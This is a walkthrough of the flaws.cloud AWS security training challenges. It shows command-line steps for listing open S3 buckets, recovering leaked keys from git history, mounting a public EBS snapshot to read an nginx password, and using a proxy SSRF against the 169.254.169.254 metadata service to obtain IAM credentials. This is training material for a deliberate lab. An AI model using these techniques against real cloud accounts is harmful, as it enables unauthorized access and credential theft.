Flaws.cloud

Hey guys! Just completed the flaws.cloud challenges some time ago. It's pretty easy and already contains lots of directives but nevertheless, I thought I would write a short post on it just as a note to myself and in hopes of helping anyone stuck a at some point. I recommend trying to complete the challenges without reading this though.

Challenge 1

First "Brute" method (the wrong way)

We are asked to find the first challenge subdomain. The first idea that comes to mind would be to enumerate subdomains either using google dorking, fierce.pl or a similar tool. I gave sublist3r a shot and retrieved a few results.

Sublist3r results

As you can see, the subdomains contain a random hexa string => Going on with subbrute would be useless so I killed the script.

So we get a few subdomains, however the home page url states the following:

homepage statement

So using Sublist3r is definitely not the right way to go! :'-(

Second method (the right way)

Retrieving the website's Ip is trivial:

$ dig +short flaws.cloud
52.218.200.219

Trying to go to the IP redirects us to https://aws.amazon.com/s3/ as explained in hint 1. This technique allows to easily fingerprint a website and know it is hosted on an S3 bucket.

The hint also tells us how to figure out the AWS region in which the bucket is hosted.

$ nslookup 54.231.184.255
Non-authoritative answer:
219.200.218.52.in-addr.arpa    name = s3-website-us-west-2.amazonaws.com.

If you don't know about AWS regions, you should read the documentation I find it very complete and self expalanatory!

Once we know the AWS region, we can fire up aws-cli and browse the S3 bucket. Aws-cli is a command line interface that allows a user to interact with several different AWS services.

aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2

Note that according to the documentation there are only a limited number of regions. Hence bruteforcing this with the table below could work. Moreover, the command works in this case without specifying the region.

Code Name

us-east-1

US East (N. Virginia)

us-east-2

US East (Ohio)

us-west-1

US West (N. California)

us-west-2

US West (Oregon)

ca-central-1

Canada (Central)

eu-west-1

EU (Ireland)

eu-central-1

EU (Frankfurt)

eu-west-2

EU (London)

ap-northeast-1

Asia Pacific (Tokyo)

ap-northeast-2

Asia Pacific (Seoul)

ap-southeast-1

Asia Pacific (Singapore)

ap-southeast-2

Asia Pacific (Sydney)

ap-south-1

Asia Pacific (Mumbai)

sa-east-1

South America (São Paulo)

If you are unsure what command to run you can get a man page with:

 $ aws help
 $ aws <command> help
 $ aws <command> <subcommand> help

Anyway, the aws command mentioned above give the following:

aws Command

Going to flaws.cloud/secret-dd02c7c.html gives us the link to the next challenge.
Yay! \^o^/

Please read hint 2 to learn other methods such as visiting

http://flaws.cloud.s3.amazonaws.com/ which lists the files due to the permissions issues on this bucket.

Challenge 2

This challenge is similar to the first but the IAM (Identity access management service) rights were misconfigured a bit differently we need a free tier. Cool! I just happen to have an account :-D

We connect to our aws free tier account (I'm not going over how to set this up as it's very easy !!! \>"

search for IAM service

Once in we select -> Users->Add user

Add user

We then make sure to tick the "Programmatic acces" in the "access type" zone.

Programmatic access

In the second step choose "Attach policies directly" and select "Administrator access"

Admin access

Once this step is done, you will get two keys: an access key id which is similar to a login name, and a secret access key. As you guessed, no one should know you secret access key...

Keys

We can now configure aws cli by running:

$ aws configure --profile <myNewAccount>

And run the challenge 1 command. This will give the following result:

aws cli account configuration

Visiting the secret-e4443fc.html page will leak the challenge3 link.

Challenge3

We begin by listing the files with the command we now know so well:

$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request
                           PRE .git/
2017-02-27 01:14:33     123637 authenticated_users.png
2017-02-27 01:14:34       1552 hint1.html
2017-02-27 01:14:34       1426 hint2.html
2017-02-27 01:14:35       1247 hint3.html
2017-02-27 01:14:33       1035 hint4.html
2017-02-27 03:05:16       1703 index.html
2017-02-27 01:14:33         26 robots.txt

We can download the whole bucket with:

$ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

Once the file downloaded, we can look for git commit history with git log (I piped to cat to have the command on the screenshot)

git history

Hmmm... Commit "2921eed99c1045b6ce2063e4eedc3923d474f891" seems interesting. Lets check out what the state of the repository was like before:

$ git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87

List all buckets that belong to account

This challenge exposes credentials left in a git commit. This is something that sometimes happen with version control tools. What is good to know is that amazon has a bot on github that revokes all private keys found on public commits.

Challenge 4

In this challenge we need to get the password to login to
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/. If we enter the wrong credentials we get the following 401 response disclosing information about the server.

Nginx server

Using the account we got from challenge 3, we can get the flaws profile unique userID.

$ aws --profile flaws sts get-caller-identity
{
    "Account": "975426262029", 
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC", 
    "Arn": "arn:aws:iam::975426262029:user/backup"
}

We can also use this ID to get the list of snapshots this account (called backup) made:

$ aws --profile flaws  ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
{
    "Snapshots": [
        {
            "Description": "", 
            "Tags": [
                {
                    "Value": "flaws backup 2017.02.27", 
                    "Key": "Name"
                }
            ], 
            "Encrypted": false, 
            "VolumeId": "vol-04f1c039bc13ea950", 
            "State": "completed", 
            "VolumeSize": 8, 
            "StartTime": "2017-02-28T01:35:12.000Z", 
            "Progress": "100%", 
            "OwnerId": "975426262029", 
            "SnapshotId": "snap-0b49342abd1bdcb89"
        }
    ]
}

(I specified the --region parameter as I left it blank in the aws configure --profile command).

Cool! We got the snapshot ID. As it is a public snapshot, it's easy to retrieve it and mount it on our own account on a free tier EC2 instance.

$ aws --profile warsangtemp ec2 create-volume --availability-zone us-west-2b --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89

Be careful what availability-zone you choose here, I had to choose us-west-2b because at the time of writing this, I could not create an ec2 instance in us-west-2a.

The screenshot below shows the commands I entered (However as explained above I had to choose a different availability zone which is not shown here).
Creating a new volume from the snapshot

Creating the EC2 instance is very simple. Search for EC2 in the service research bar, go to ->Instances->Launch Instance and choose the free tier Ubuntu X64 .

Free tier EC2 instance

You can then select all the defaults for the following steps. Just make sure the second step also uses a free tier eligible option.

Free tier option

Oh and on the last step, you might want to create a new ssh key or use your own.

Key pair

You can now launch your EC2 instance (this is normally done as soon as you press the launch button in the above screenshot) and connect using ssh.

$ ssh -i flawscloud.pem ubuntu@ec2-52-37-129-99.us-west-2.compute.amazonaws.com

We can now mount the snapshot:

$ lsblk
NAME    MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
xvda    202:0    0   8G  0 disk 
`-xvda1 202:1    0   8G  0 part /
xvdf    202:80   0   8G  0 disk 
`-xvdf1 202:81   0   8G  0 part
$ sudo file -s /dev/xvdf1
/dev/xvdf1: Linux rev 1.0 ext4 filesystem data, UUID=5a2075d0-d095-4511-bef9-802fd8a7610e, volume name "cloudimg-rootfs" (needs journal recovery) (extents) (large files) (huge files)
$ sudo mount /dev/xvdf1 /mnt
$ ls /mnt
bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old

The /dev/xvdf1 block device might actually have another name for you. Take a look in /dev and use the file -s command just to make sure.

Remember the error message we got before showing there was an Nginx server running? Lets try and find an Nginx related file and read it's content.

$ cat $(find . -name "*Nginx*" > /dev/null)
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Typing the username and password on the blocked page will give us a link to challenge5!

Challenge 5

So we are asked to list the contents of level 5,going to the level 6 link returns an error message.

Level 6 denied access

Level 5 makes use of a proxy to query other pages.

$ http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/<MycoolWebsite.something>

I really had no idea where to go from there as I couldn't list the contents right of using aws cli. I looked at hint 1 which told me to try the following IP 169.254.169.254 which allows an instance to view it's metadata.

$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
1.0
2007-01-19
2007-3-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
latest%

The http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest url seemed interesting as meta-data did not return any resultse...

latest

I don't know much about aws, but I do know that IAM (Identity and Access Management) is usually where an attacker might want to go to find interesting data. However, just appending iam to the link did not return anything interesting. So I went and read the (awesome) aws documentation and stumbled upon something.

Something I stumbled upon

Trying "iam/info" returned the following:

iam/info

So we now know there's a user named flaws associated to this EC2 instance. Going to "/iam/security-credentials/flaws" should return something right?...

result of /iam/security-credentials/flaws

Bingo! Some interesting data :D . But just using aws configure --profile is not enoug this time. We need to add the token somehow. Typing aws confiure help or trying hint 3 returns the answer. Don't use the credentials in hint3 as they have expired. Use your own.

$ aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
                           PRE ddcc78ff/
2017-02-27 03:11:07        871 index.html

Going to http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ gives us level 6.

Challenge6

For the final challenge we get a user access key and a secret key with a Security audit IAM policy attached to it (remember how we defined these in challenge 3?).

So we fire up aws configure:

$ aws configure --profile level6

A quick google search for "SecurityAudit Iam policy" returns the following link

I won't finish this write-up as the rest is just following the hint instructions from level 6 and I don't believe I can actually bring any precisions to the reader on those hints. Not reading the hints for challenge6 is pretty difficult without reading a lot of documentation for anyone who hasn't played around with aws before!

Big thanks to Scott Piper @0xdabbad00 and summitroute.com thanks to whom I learnt a lot about AWS!

All the links to challenges and end:
Level1 Level2 Level3 Level4 Level5 Level6 End

Here is some extra reading on aws security:

Security audit

AWS security model whitepaper (In French)

Cloudsploit

Cloudsploit github